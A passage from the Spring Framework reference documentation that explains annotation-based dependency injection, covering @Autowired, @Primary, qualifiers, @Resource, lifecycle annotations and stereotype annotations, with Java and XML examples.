@Autowired\n\n[NOTE]\n====\nJSR 330's `@Inject` annotation can be used in place of Spring's `@Autowired` annotation\nin the examples below. See <<beans-standard-annotations,here>> for more details.\n====\n\nYou can apply the `@Autowired` annotation to constructors:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class MovieRecommender {\n\n\t\tprivate final CustomerPreferenceDao customerPreferenceDao;\n\n\t\t@Autowired\n\t\tpublic MovieRecommender(CustomerPreferenceDao customerPreferenceDao) {\n\t\t\tthis.customerPreferenceDao = customerPreferenceDao;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\n[NOTE]\n====\nAs of Spring Framework 4.3, the `@Autowired` constructor is no longer necessary if the\ntarget bean only defines one constructor. If several constructors are available, at\nleast one must be annotated to teach the container which one it has to use.\n====\n\nAs expected, you can also apply the `@Autowired` annotation to \"traditional\" setter\nmethods:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class SimpleMovieLister {\n\n\t\tprivate MovieFinder movieFinder;\n\n\t\t@Autowired\n\t\tpublic void setMovieFinder(MovieFinder movieFinder) {\n\t\t\tthis.movieFinder = movieFinder;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nYou can also apply the annotation to methods with arbitrary names and\/or multiple\narguments:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class MovieRecommender {\n\n\t\tprivate MovieCatalog movieCatalog;\n\n\t\tprivate CustomerPreferenceDao customerPreferenceDao;\n\n\t\t@Autowired\n\t\tpublic void prepare(MovieCatalog movieCatalog,\n\t\t\t\tCustomerPreferenceDao customerPreferenceDao) {\n\t\t\tthis.movieCatalog = movieCatalog;\n\t\t\tthis.customerPreferenceDao = customerPreferenceDao;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nYou can apply `@Autowired` to fields as well and even mix it with constructors:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class MovieRecommender {\n\n\t\tprivate final CustomerPreferenceDao customerPreferenceDao;\n\n\t\t@Autowired\n\t\tprivate MovieCatalog movieCatalog;\n\n\t\t@Autowired\n\t\tpublic MovieRecommender(CustomerPreferenceDao customerPreferenceDao) {\n\t\t\tthis.customerPreferenceDao = customerPreferenceDao;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nIt is also possible to provide __all__ beans of a particular type from the\n`ApplicationContext` by adding the annotation to a field or method that expects an array\nof that type:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class MovieRecommender {\n\n\t\t@Autowired\n\t\tprivate MovieCatalog[] movieCatalogs;\n\n\t\t\/\/ ...\n\n\t}\n----\n\nThe same applies for typed collections:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class MovieRecommender {\n\n\t\tprivate Set<MovieCatalog> movieCatalogs;\n\n\t\t@Autowired\n\t\tpublic void setMovieCatalogs(Set<MovieCatalog> movieCatalogs) {\n\t\t\tthis.movieCatalogs = movieCatalogs;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\n[TIP]\n====\nYour beans can implement the `org.springframework.core.Ordered` interface or either use\nthe `@Order` or standard `@Priority` annotation if you want items in the array or list\nto be sorted into a specific order.\n====\n\n\nEven typed Maps can be autowired as long as the expected key type is `String`. The Map\nvalues will contain all beans of the expected type, and the keys will contain the\ncorresponding bean names:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class MovieRecommender {\n\n\t\tprivate Map<String, MovieCatalog> movieCatalogs;\n\n\t\t@Autowired\n\t\tpublic void setMovieCatalogs(Map<String, MovieCatalog> movieCatalogs) {\n\t\t\tthis.movieCatalogs = movieCatalogs;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nBy default, the autowiring fails whenever __zero__ candidate beans are available; the\ndefault behavior is to treat annotated methods, constructors, and fields as\nindicating __required__ dependencies. This behavior can be changed as demonstrated below.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class SimpleMovieLister {\n\n\t\tprivate MovieFinder movieFinder;\n\n\t\t@Autowired(required=false)\n\t\tpublic void setMovieFinder(MovieFinder movieFinder) {\n\t\t\tthis.movieFinder = movieFinder;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\n[NOTE]\n====\nOnly __one annotated constructor per-class__ can be marked as __required__, but multiple\nnon-required constructors can be annotated. In that case, each is considered among the\ncandidates and Spring uses the __greediest__ constructor whose dependencies can be\nsatisfied, that is the constructor that has the largest number of arguments.\n\n`@Autowired`'s __required__ attribute is recommended over the `@Required` annotation.\nThe __required__ attribute indicates that the property is not required for autowiring\npurposes, the property is ignored if it cannot be autowired. `@Required`, on the other\nhand, is stronger in that it enforces the property that was set by any means supported\nby the container. If no value is injected, a corresponding exception is raised.\n====\n\nYou can also use `@Autowired` for interfaces that are well-known resolvable\ndependencies: `BeanFactory`, `ApplicationContext`, `Environment`, `ResourceLoader`,\n`ApplicationEventPublisher`, and `MessageSource`. These interfaces and their extended\ninterfaces, such as `ConfigurableApplicationContext` or `ResourcePatternResolver`, are\nautomatically resolved, with no special setup necessary.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class MovieRecommender {\n\n\t\t@Autowired\n\t\tprivate ApplicationContext context;\n\n\t\tpublic MovieRecommender() {\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\n[NOTE]\n====\n`@Autowired`, `@Inject`, `@Resource`, and `@Value` annotations are handled by Spring\n`BeanPostProcessor` implementations which in turn means that you __cannot__ apply these\nannotations within your own `BeanPostProcessor` or `BeanFactoryPostProcessor` types (if\nany). These types must be 'wired up' explicitly via XML or using a Spring `@Bean` method.\n====\n\n\n[[beans-autowired-annotation-primary]]\n=== Fine-tuning annotation-based autowiring with @Primary\n\nBecause autowiring by type may lead to multiple candidates, it is often necessary to have\nmore control over the selection process. One way to accomplish this is with Spring's\n`@Primary` annotation. `@Primary` indicates that a particular bean should be given\npreference when multiple beans are candidates to be autowired to a single-valued\ndependency. If exactly one 'primary' bean exists among the candidates, it will be the\nautowired value.\n\nLet's assume we have the following configuration that defines `firstMovieCatalog` as the\n_primary_ `MovieCatalog`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class MovieConfiguration {\n\n\t\t@Bean\n\t\t**@Primary**\n\t\tpublic MovieCatalog firstMovieCatalog() { ... }\n\n\t\t@Bean\n\t\tpublic MovieCatalog secondMovieCatalog() { ... }\n\n\t\t\/\/ ...\n\n\t}\n----\n\nWith such configuration, the following `MovieRecommender` will be autowired with the\n`firstMovieCatalog`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class MovieRecommender {\n\n\t\t@Autowired\n\t\tprivate MovieCatalog movieCatalog;\n\n\t\t\/\/ ...\n\n\t}\n----\n\n\nThe corresponding bean definitions appear as follows.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txmlns:context=\"http:\/\/www.springframework.org\/schema\/context\"\n\t\txsi:schemaLocation=\"http:\/\/www.springframework.org\/schema\/beans\n\t\t\thttp:\/\/www.springframework.org\/schema\/beans\/spring-beans.xsd\n\t\t\thttp:\/\/www.springframework.org\/schema\/context\n\t\t\thttp:\/\/www.springframework.org\/schema\/context\/spring-context.xsd\">\n\n\t\t<context:annotation-config\/>\n\n\t\t<bean class=\"example.SimpleMovieCatalog\" **primary=\"true\"**>\n\t\t\t<!-- inject any dependencies required by this bean -->\n\t\t<\/bean>\n\n\t\t<bean class=\"example.SimpleMovieCatalog\">\n\t\t\t<!-- inject any dependencies required by this bean -->\n\t\t<\/bean>\n\n\t\t<bean id=\"movieRecommender\" class=\"example.MovieRecommender\"\/>\n\n\t<\/beans>\n----\n\n\n[[beans-autowired-annotation-qualifiers]]\n=== Fine-tuning annotation-based autowiring with qualifiers\n\n`@Primary` is an effective way to use autowiring by type with several instances when one\nprimary candidate can be determined. When more control over the selection process is\nrequired, Spring's `@Qualifier` annotation can be used. You can associate qualifier values\nwith specific arguments, narrowing the set of type matches so that a specific bean is\nchosen for each argument. In the simplest case, this can be a plain descriptive value:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class MovieRecommender {\n\n\t\t@Autowired\n\t\t**@Qualifier(\"main\")**\n\t\tprivate MovieCatalog movieCatalog;\n\n\t\t\/\/ ...\n\n\t}\n----\n\nThe `@Qualifier` annotation can also be specified on individual constructor arguments or\nmethod parameters:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class MovieRecommender {\n\n\t\tprivate MovieCatalog movieCatalog;\n\n\t\tprivate CustomerPreferenceDao customerPreferenceDao;\n\n\t\t@Autowired\n\t\tpublic void prepare(**@Qualifier(\"main\")**MovieCatalog movieCatalog,\n\t\t\t\tCustomerPreferenceDao customerPreferenceDao) {\n\t\t\tthis.movieCatalog = movieCatalog;\n\t\t\tthis.customerPreferenceDao = customerPreferenceDao;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nThe corresponding bean definitions appear as follows. The bean with qualifier value\n\"main\" is wired with the constructor argument that is qualified with the same value.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txmlns:context=\"http:\/\/www.springframework.org\/schema\/context\"\n\t\txsi:schemaLocation=\"http:\/\/www.springframework.org\/schema\/beans\n\t\t\thttp:\/\/www.springframework.org\/schema\/beans\/spring-beans.xsd\n\t\t\thttp:\/\/www.springframework.org\/schema\/context\n\t\t\thttp:\/\/www.springframework.org\/schema\/context\/spring-context.xsd\">\n\n\t\t<context:annotation-config\/>\n\n\t\t<bean class=\"example.SimpleMovieCatalog\">\n\t\t\t**<qualifier value=\"main\"\/>**\n\n\t\t\t<!-- inject any dependencies required by this bean -->\n\t\t<\/bean>\n\n\t\t<bean class=\"example.SimpleMovieCatalog\">\n\t\t\t**<qualifier value=\"action\"\/>**\n\n\t\t\t<!-- inject any dependencies required by this bean -->\n\t\t<\/bean>\n\n\t\t<bean id=\"movieRecommender\" class=\"example.MovieRecommender\"\/>\n\n\t<\/beans>\n----\n\nFor a fallback match, the bean name is considered a default qualifier value. Thus you\ncan define the bean with an id \"main\" instead of the nested qualifier element, leading\nto the same matching result. However, although you can use this convention to refer to\nspecific beans by name, `@Autowired` is fundamentally about type-driven injection with\noptional semantic qualifiers. This means that qualifier values, even with the bean name\nfallback, always have narrowing semantics within the set of type matches; they do not\nsemantically express a reference to a unique bean id. Good qualifier values are \"main\"\nor \"EMEA\" or \"persistent\", expressing characteristics of a specific component that are\nindependent from the bean `id`, which may be auto-generated in case of an anonymous bean\ndefinition like the one in the preceding example.\n\nQualifiers also apply to typed collections, as discussed above, for example, to\n`Set<MovieCatalog>`. In this case, all matching beans according to the declared\nqualifiers are injected as a collection. This implies that qualifiers do not have to be\nunique; they rather simply constitute filtering criteria. For example, you can define\nmultiple `MovieCatalog` beans with the same qualifier value \"action\", all of which would\nbe injected into a `Set<MovieCatalog>` annotated with `@Qualifier(\"action\")`.\n\n[TIP]\n====\n\nIf you intend to express annotation-driven injection by name, do not primarily use\n`@Autowired`, even if is technically capable of referring to a bean name through\n`@Qualifier` values. Instead, use the JSR-250 `@Resource` annotation, which is\nsemantically defined to identify a specific target component by its unique name, with\nthe declared type being irrelevant for the matching process. `@Autowired` has rather\ndifferent semantics: After selecting candidate beans by type, the specified String\nqualifier value will be considered within those type-selected candidates only, e.g.\nmatching an \"account\" qualifier against beans marked with the same qualifier label.\n\nFor beans that are themselves defined as a collection\/map or array type, `@Resource`\nis a fine solution, referring to the specific collection or array bean by unique name.\nThat said, as of 4.3, collection\/map and array types can be matched through Spring's\n`@Autowired` type matching algorithm as well, as long as the element type information\nis preserved in `@Bean` return type signatures or collection inheritance hierarchies.\nIn this case, qualifier values can be used to select among same-typed collections,\nas outlined in the previous paragraph.\n\nAs of 4.3, `@Autowired` also considers self references for injection, i.e. references\nback to the bean that is currently injected. Note that self injection is a fallback;\nregular dependencies on other components always have precedence. In that sense, self\nreferences do not participate in regular candidate selection and are therefore in\nparticular never primary; on the contrary, they always end up as lowest precedence.\nIn practice, use self references as a last resort only, e.g. for calling other methods\non the same instance through the bean's transactional proxy: Consider factoring out\nthe affected methods to a separate delegate bean in such a scenario. Alternatively,\nuse `@Resource` which may obtain a proxy back to the current bean by its unique name.\n\n`@Autowired` applies to fields, constructors, and multi-argument methods, allowing for\nnarrowing through qualifier annotations at the parameter level. By contrast, `@Resource`\nis supported only for fields and bean property setter methods with a single argument.\nAs a consequence, stick with qualifiers if your injection target is a constructor or a\nmulti-argument method.\n====\n\nYou can create your own custom qualifier annotations. Simply define an annotation and\nprovide the `@Qualifier` annotation within your definition:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Target({ElementType.FIELD, ElementType.PARAMETER})\n\t@Retention(RetentionPolicy.RUNTIME)\n\t**@Qualifier**\n\tpublic @interface Genre {\n\n\t\tString value();\n\t}\n----\n\nThen you can provide the custom qualifier on autowired fields and parameters:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class MovieRecommender {\n\n\t\t@Autowired\n\t\t**@Genre(\"Action\")**\n\t\tprivate MovieCatalog actionCatalog;\n\t\tprivate MovieCatalog comedyCatalog;\n\n\t\t@Autowired\n\t\tpublic void setComedyCatalog(**@Genre(\"Comedy\")** MovieCatalog comedyCatalog) {\n\t\t\tthis.comedyCatalog = comedyCatalog;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nNext, provide the information for the candidate bean definitions. You can add\n`<qualifier\/>` tags as sub-elements of the `<bean\/>` tag and then specify the `type` and\n`value` to match your custom qualifier annotations. The type is matched against the\nfully-qualified class name of the annotation. Or, as a convenience if no risk of\nconflicting names exists, you can use the short class name. Both approaches are\ndemonstrated in the following example.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txmlns:context=\"http:\/\/www.springframework.org\/schema\/context\"\n\t\txsi:schemaLocation=\"http:\/\/www.springframework.org\/schema\/beans\n\t\t\thttp:\/\/www.springframework.org\/schema\/beans\/spring-beans.xsd\n\t\t\thttp:\/\/www.springframework.org\/schema\/context\n\t\t\thttp:\/\/www.springframework.org\/schema\/context\/spring-context.xsd\">\n\n\t\t<context:annotation-config\/>\n\n\t\t<bean class=\"example.SimpleMovieCatalog\">\n\t\t\t**<qualifier type=\"Genre\" value=\"Action\"\/>**\n\t\t\t<!-- inject any dependencies required by this bean -->\n\t\t<\/bean>\n\n\t\t<bean class=\"example.SimpleMovieCatalog\">\n\t\t\t**<qualifier type=\"example.Genre\" value=\"Comedy\"\/>**\n\t\t\t<!-- inject any dependencies required by this bean -->\n\t\t<\/bean>\n\n\t\t<bean id=\"movieRecommender\" class=\"example.MovieRecommender\"\/>\n\n\t<\/beans>\n----\n\nIn <<beans-classpath-scanning>>, you will see an annotation-based alternative to\nproviding the qualifier metadata in XML. Specifically, see <<beans-scanning-qualifiers>>.\n\nIn some cases, it may be sufficient to use an annotation without a value. This may be\nuseful when the annotation serves a more generic purpose and can be applied across\nseveral different types of dependencies. For example, you may provide an __offline__\ncatalog that would be searched when no Internet connection is available. First define\nthe simple annotation:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Target({ElementType.FIELD, ElementType.PARAMETER})\n\t@Retention(RetentionPolicy.RUNTIME)\n\t@Qualifier\n\tpublic @interface Offline {\n\n\t}\n----\n\nThen add the annotation to the field or property to be autowired:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class MovieRecommender {\n\n\t\t@Autowired\n\t\t**@Offline**\n\t\tprivate MovieCatalog offlineCatalog;\n\n\t\t\/\/ ...\n\n\t}\n----\n\nNow the bean definition only needs a qualifier `type`:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean class=\"example.SimpleMovieCatalog\">\n\t\t**<qualifier type=\"Offline\"\/>**\n\t\t<!-- inject any dependencies required by this bean -->\n\t<\/bean>\n----\n\nYou can also define custom qualifier annotations that accept named attributes in\naddition to or instead of the simple `value` attribute. If multiple attribute values are\nthen specified on a field or parameter to be autowired, a bean definition must match\n__all__ such attribute values to be considered an autowire candidate. As an example,\nconsider the following annotation definition:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Target({ElementType.FIELD, ElementType.PARAMETER})\n\t@Retention(RetentionPolicy.RUNTIME)\n\t@Qualifier\n\tpublic @interface MovieQualifier {\n\n\t\tString genre();\n\n\t\tFormat format();\n\n\t}\n----\n\nIn this case `Format` is an enum:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic enum Format {\n\t\tVHS, DVD, BLURAY\n\t}\n----\n\nThe fields to be autowired are annotated with the custom qualifier and include values\nfor both attributes: `genre` and `format`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class MovieRecommender {\n\n\t\t@Autowired\n\t\t@MovieQualifier(format=Format.VHS, genre=\"Action\")\n\t\tprivate MovieCatalog actionVhsCatalog;\n\n\t\t@Autowired\n\t\t@MovieQualifier(format=Format.VHS, genre=\"Comedy\")\n\t\tprivate MovieCatalog comedyVhsCatalog;\n\n\t\t@Autowired\n\t\t@MovieQualifier(format=Format.DVD, genre=\"Action\")\n\t\tprivate MovieCatalog actionDvdCatalog;\n\n\t\t@Autowired\n\t\t@MovieQualifier(format=Format.BLURAY, genre=\"Comedy\")\n\t\tprivate MovieCatalog comedyBluRayCatalog;\n\n\t\t\/\/ ...\n\n\t}\n----\n\nFinally, the bean definitions should contain matching qualifier values. This example\nalso demonstrates that bean __meta__ attributes may be used instead of the\n`<qualifier\/>` sub-elements. If available, the `<qualifier\/>` and its attributes take\nprecedence, but the autowiring mechanism falls back on the values provided within the\n`<meta\/>` tags if no such qualifier is present, as in the last two bean definitions in\nthe following example.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txmlns:context=\"http:\/\/www.springframework.org\/schema\/context\"\n\t\txsi:schemaLocation=\"http:\/\/www.springframework.org\/schema\/beans\n\t\t\thttp:\/\/www.springframework.org\/schema\/beans\/spring-beans.xsd\n\t\t\thttp:\/\/www.springframework.org\/schema\/context\n\t\t\thttp:\/\/www.springframework.org\/schema\/context\/spring-context.xsd\">\n\n\t\t<context:annotation-config\/>\n\n\t\t<bean class=\"example.SimpleMovieCatalog\">\n\t\t\t<qualifier type=\"MovieQualifier\">\n\t\t\t\t<attribute key=\"format\" value=\"VHS\"\/>\n\t\t\t\t<attribute key=\"genre\" value=\"Action\"\/>\n\t\t\t<\/qualifier>\n\t\t\t<!-- inject any dependencies required by this bean -->\n\t\t<\/bean>\n\n\t\t<bean class=\"example.SimpleMovieCatalog\">\n\t\t\t<qualifier type=\"MovieQualifier\">\n\t\t\t\t<attribute key=\"format\" value=\"VHS\"\/>\n\t\t\t\t<attribute key=\"genre\" value=\"Comedy\"\/>\n\t\t\t<\/qualifier>\n\t\t\t<!-- inject any dependencies required by this bean -->\n\t\t<\/bean>\n\n\t\t<bean class=\"example.SimpleMovieCatalog\">\n\t\t\t<meta key=\"format\" value=\"DVD\"\/>\n\t\t\t<meta key=\"genre\" value=\"Action\"\/>\n\t\t\t<!-- inject any dependencies required by this bean -->\n\t\t<\/bean>\n\n\t\t<bean class=\"example.SimpleMovieCatalog\">\n\t\t\t<meta key=\"format\" value=\"BLURAY\"\/>\n\t\t\t<meta key=\"genre\" value=\"Comedy\"\/>\n\t\t\t<!-- inject any dependencies required by this bean -->\n\t\t<\/bean>\n\n\t<\/beans>\n----\n\n\n\n[[beans-generics-as-qualifiers]]\n=== Using generics as autowiring qualifiers\n\nIn addition to the `@Qualifier` annotation, it is also possible to use Java generic types\nas an implicit form of qualification. For example, suppose you have the following\nconfiguration:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class MyConfiguration {\n\n\t\t@Bean\n\t\tpublic StringStore stringStore() {\n\t\t\treturn new StringStore();\n\t\t}\n\n\t\t@Bean\n\t\tpublic IntegerStore integerStore() {\n\t\t\treturn new IntegerStore();\n\t\t}\n\n\t}\n----\n\nAssuming that beans above implement a generic interface, i.e. `Store<String>` and\n`Store<Integer>`, you can `@Autowire` the `Store` interface and the __generic__ will\nbe used as a qualifier:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Autowired\n\tprivate Store<String> s1; \/\/ <String> qualifier, injects the stringStore bean\n\n\t@Autowired\n\tprivate Store<Integer> s2; \/\/ <Integer> qualifier, injects the integerStore bean\n----\n\nGeneric qualifiers also apply when autowiring Lists, Maps and Arrays:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t\/\/ Inject all Store beans as long as they have an <Integer> generic\n\t\/\/ Store<String> beans will not appear in this list\n\t@Autowired\n\tprivate List<Store<Integer>> s;\n----\n\n\n\n\n[[beans-custom-autowire-configurer]]\n=== CustomAutowireConfigurer\n\nThe\n{api-spring-framework}\/beans\/factory\/annotation\/CustomAutowireConfigurer.html[`CustomAutowireConfigurer`]\nis a `BeanFactoryPostProcessor` that enables you to register your own custom qualifier\nannotation types even if they are not annotated with Spring's `@Qualifier` annotation.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"customAutowireConfigurer\"\n\t\t\tclass=\"org.springframework.beans.factory.annotation.CustomAutowireConfigurer\">\n\t\t<property name=\"customQualifierTypes\">\n\t\t\t<set>\n\t\t\t\t<value>example.CustomQualifier<\/value>\n\t\t\t<\/set>\n\t\t<\/property>\n\t<\/bean>\n----\n\nThe `AutowireCandidateResolver` determines autowire candidates by:\n\n* the `autowire-candidate` value of each bean definition\n* any `default-autowire-candidates` pattern(s) available on the `<beans\/>` element\n* the presence of `@Qualifier` annotations and any custom annotations registered\nwith the `CustomAutowireConfigurer`\n\nWhen multiple beans qualify as autowire candidates, the determination of a \"primary\" is\nthe following: if exactly one bean definition among the candidates has a `primary`\nattribute set to `true`, it will be selected.\n\n\n\n[[beans-resource-annotation]]\n=== @Resource\n\nSpring also supports injection using the JSR-250 `@Resource` annotation on fields or\nbean property setter methods. This is a common pattern in Java EE 5 and 6, for example\nin JSF 1.2 managed beans or JAX-WS 2.0 endpoints. Spring supports this pattern for\nSpring-managed objects as well.\n\n`@Resource` takes a name attribute, and by default Spring interprets that value as the\nbean name to be injected. In other words, it follows __by-name__ semantics, as\ndemonstrated in this example:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class SimpleMovieLister {\n\n\t\tprivate MovieFinder movieFinder;\n\n\t\t**@Resource(name=\"myMovieFinder\")**\n\t\tpublic void setMovieFinder(MovieFinder movieFinder) {\n\t\t\tthis.movieFinder = movieFinder;\n\t\t}\n\n\t}\n----\n\nIf no name is specified explicitly, the default name is derived from the field name or\nsetter method. In case of a field, it takes the field name; in case of a setter method,\nit takes the bean property name. So the following example is going to have the bean with\nname \"movieFinder\" injected into its setter method:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class SimpleMovieLister {\n\n\t\tprivate MovieFinder movieFinder;\n\n\t\t**@Resource**\n\t\tpublic void setMovieFinder(MovieFinder movieFinder) {\n\t\t\tthis.movieFinder = movieFinder;\n\t\t}\n\n\t}\n----\n\n[NOTE]\n====\nThe name provided with the annotation is resolved as a bean name by the\n`ApplicationContext` of which the `CommonAnnotationBeanPostProcessor` is aware. The\nnames can be resolved through JNDI if you configure Spring's\n{api-spring-framework}\/jndi\/support\/SimpleJndiBeanFactory.html[`SimpleJndiBeanFactory`]\nexplicitly. However, it is recommended that you rely on the default behavior and simply\nuse Spring's JNDI lookup capabilities to preserve the level of indirection.\n====\n\nIn the exclusive case of `@Resource` usage with no explicit name specified, and similar\nto `@Autowired`, `@Resource` finds a primary type match instead of a specific named bean\nand resolves well-known resolvable dependencies: the `BeanFactory`,\n`ApplicationContext`, `ResourceLoader`, `ApplicationEventPublisher`, and `MessageSource`\ninterfaces.\n\nThus in the following example, the `customerPreferenceDao` field first looks for a bean\nnamed customerPreferenceDao, then falls back to a primary type match for the type\n`CustomerPreferenceDao`. The \"context\" field is injected based on the known resolvable\ndependency type `ApplicationContext`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class MovieRecommender {\n\n\t\t@Resource\n\t\tprivate CustomerPreferenceDao customerPreferenceDao;\n\n\t\t@Resource\n\t\tprivate ApplicationContext context;\n\n\t\tpublic MovieRecommender() {\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\n\n\n[[beans-postconstruct-and-predestroy-annotations]]\n=== @PostConstruct and @PreDestroy\n\nThe `CommonAnnotationBeanPostProcessor` not only recognizes the `@Resource` annotation\nbut also the JSR-250 __lifecycle__ annotations. Introduced in Spring 2.5, the support\nfor these annotations offers yet another alternative to those described in\n<<beans-factory-lifecycle-initializingbean,initialization callbacks>> and\n<<beans-factory-lifecycle-disposablebean,destruction callbacks>>. Provided that the\n`CommonAnnotationBeanPostProcessor` is registered within the Spring\n`ApplicationContext`, a method carrying one of these annotations is invoked at the same\npoint in the lifecycle as the corresponding Spring lifecycle interface method or\nexplicitly declared callback method. In the example below, the cache will be\npre-populated upon initialization and cleared upon destruction.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class CachingMovieLister {\n\n\t\t@PostConstruct\n\t\tpublic void populateMovieCache() {\n\t\t\t\/\/ populates the movie cache upon initialization...\n\t\t}\n\n\t\t@PreDestroy\n\t\tpublic void clearMovieCache() {\n\t\t\t\/\/ clears the movie cache upon destruction...\n\t\t}\n\n\t}\n----\n\n[NOTE]\n====\nFor details about the effects of combining various lifecycle mechanisms, see\n<<beans-factory-lifecycle-combined-effects>>.\n====\n\n\n\n\n[[beans-classpath-scanning]]\n== Classpath scanning and managed components\nMost examples in this chapter use XML to specify the configuration metadata that produces\neach `BeanDefinition` within the Spring container. The previous section\n(<<beans-annotation-config>>) demonstrates how to provide a lot of the configuration\nmetadata through source-level annotations. Even in those examples, however, the \"base\"\nbean definitions are explicitly defined in the XML file, while the annotations only drive\nthe dependency injection. This section describes an option for implicitly detecting the\n__candidate components__ by scanning the classpath. Candidate components are classes that\nmatch against a filter criteria and have a corresponding bean definition registered with\nthe container. This removes the need to use XML to perform bean registration; instead you\ncan use annotations (for example `@Component`), AspectJ type expressions, or your own\ncustom filter criteria to select which classes will have bean definitions registered with\nthe container.\n\n[NOTE]\n====\nStarting with Spring 3.0, many features provided by the Spring JavaConfig project are\npart of the core Spring Framework. This allows you to define beans using Java rather\nthan using the traditional XML files. Take a look at the `@Configuration`, `@Bean`,\n`@Import`, and `@DependsOn` annotations for examples of how to use these new features.\n====\n\n\n\n[[beans-stereotype-annotations]]\n=== @Component and further stereotype annotations\n\nThe `@Repository` annotation is a marker for any class that fulfills the role or\n__stereotype__ of a repository (also known as Data Access Object or DAO). Among the uses\nof this marker is the automatic translation of exceptions as described in\n<<orm-exception-translation>>.\n\nSpring provides further stereotype annotations: `@Component`, `@Service`, and\n`@Controller`. `@Component` is a generic stereotype for any Spring-managed component.\n`@Repository`, `@Service`, and `@Controller` are specializations of `@Component` for\nmore specific use cases, for example, in the persistence, service, and presentation\nlayers, respectively. Therefore, you can annotate your component classes with\n`@Component`, but by annotating them with `@Repository`, `@Service`, or `@Controller`\ninstead, your classes are more properly suited for processing by tools or associating\nwith aspects. For example, these stereotype annotations make ideal targets for\npointcuts. It is also possible that `@Repository`, `@Service`, and `@Controller` may\ncarry additional semantics in future releases of the Spring Framework. Thus, if you are\nchoosing between using `@Component` or `@Service` for your service layer, `@Service` is\nclearly the better choice. Similarly, as stated above, `@Repository` is already\nsupported as a marker for automatic exception translation in your persistence layer.\n\n\n\n[[beans-meta-annotations]]\n=== Meta-annotations\n\nMany of the annotations provided by Spring can be used as __meta-annotations__ in your\nown code. A meta-annotation is simply an annotation that can be applied to another\nannotation. For example, the `@Service` annotation mentioned above is meta-annotated with\n`@Component`:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Target(ElementType.TYPE)\n\t@Retention(RetentionPolicy.RUNTIME)\n\t@Documented\n\t**@Component** \/\/ Spring will see this and treat @Service in the same way as @Component\n\tpublic @interface Service {\n\n\t\t\/\/ ....\n\t}\n----\n\nMeta-annotations can also be combined to create __composed annotations__. For example,\nthe `@RestController` annotation from Spring MVC is __composed__ of `@Controller` and\n`@ResponseBody`.\n\nIn addition, composed annotations may optionally redeclare attributes 